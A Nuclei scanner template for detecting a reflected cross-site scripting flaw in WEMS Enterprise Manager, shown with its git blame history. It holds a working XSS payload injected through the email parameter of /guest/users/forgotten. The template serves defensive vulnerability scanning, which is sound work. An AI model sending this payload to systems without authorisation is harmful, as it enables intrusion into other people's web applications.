nuclei-templates/http/vulnerabilities/other/wems-manager-xss.yaml

id: wems-manager-xss

info:
  name: WEMS Enterprise Manager - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: WEMS Enterprise Manager contains a cross-site scripting vulnerability via the /guest/users/forgotten endpoint and the email parameter, which allows a remote attacker to inject arbitrary JavaScript into the response return by the server.
  reference:
    - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,packetstorm

http:
  - method: GET
    path:
      - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"><script>confirm(document.domain)</script>'
        part: body

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4a0a004730450221009059092b5d3c6795a9ad6b1ff564488f7c8522a41f81a3cf7bf3bc037b51a85902203147ac941415e429f1cd65b7e4c69535a777e03beab2c810bb38d9480d3e78e7:922c64590222798bb761d5b6d8e72950
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`id: wems-manager-xss`

			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: WEMS Enterprise Manager - Cross-Site Scripting`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`author: pikpikcu`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`severity: high`
			`description: WEMS Enterprise Manager contains a cross-site scripting vulnerability via the /guest/users/forgotten endpoint and the email parameter, which allows a remote attacker to inject arbitrary JavaScript into the response return by the server.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Make references visible 2021-04-29 05:57:39 +00:00			`- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
			`cvss-score: 7.2`
			`cwe-id: CWE-79`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: xss,packetstorm`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'`
templateman update 2023-10-14 11:27:55 +00:00
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
templateman update 2023-10-14 11:27:55 +00:00
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`- type: word`
			`words:`
			`- '"><script>confirm(document.domain)</script>'`
			`part: body`
templateman update 2023-10-14 11:27:55 +00:00
Adding content type checks for XSS templates 2020-12-13 19:24:23 +00:00			`- type: word`
			`words:`
			`- "text/html"`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`part: header`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a004730450221009059092b5d3c6795a9ad6b1ff564488f7c8522a41f81a3cf7bf3bc037b51a85902203147ac941415e429f1cd65b7e4c69535a777e03beab2c810bb38d9480d3e78e7:922c64590222798bb761d5b6d8e72950`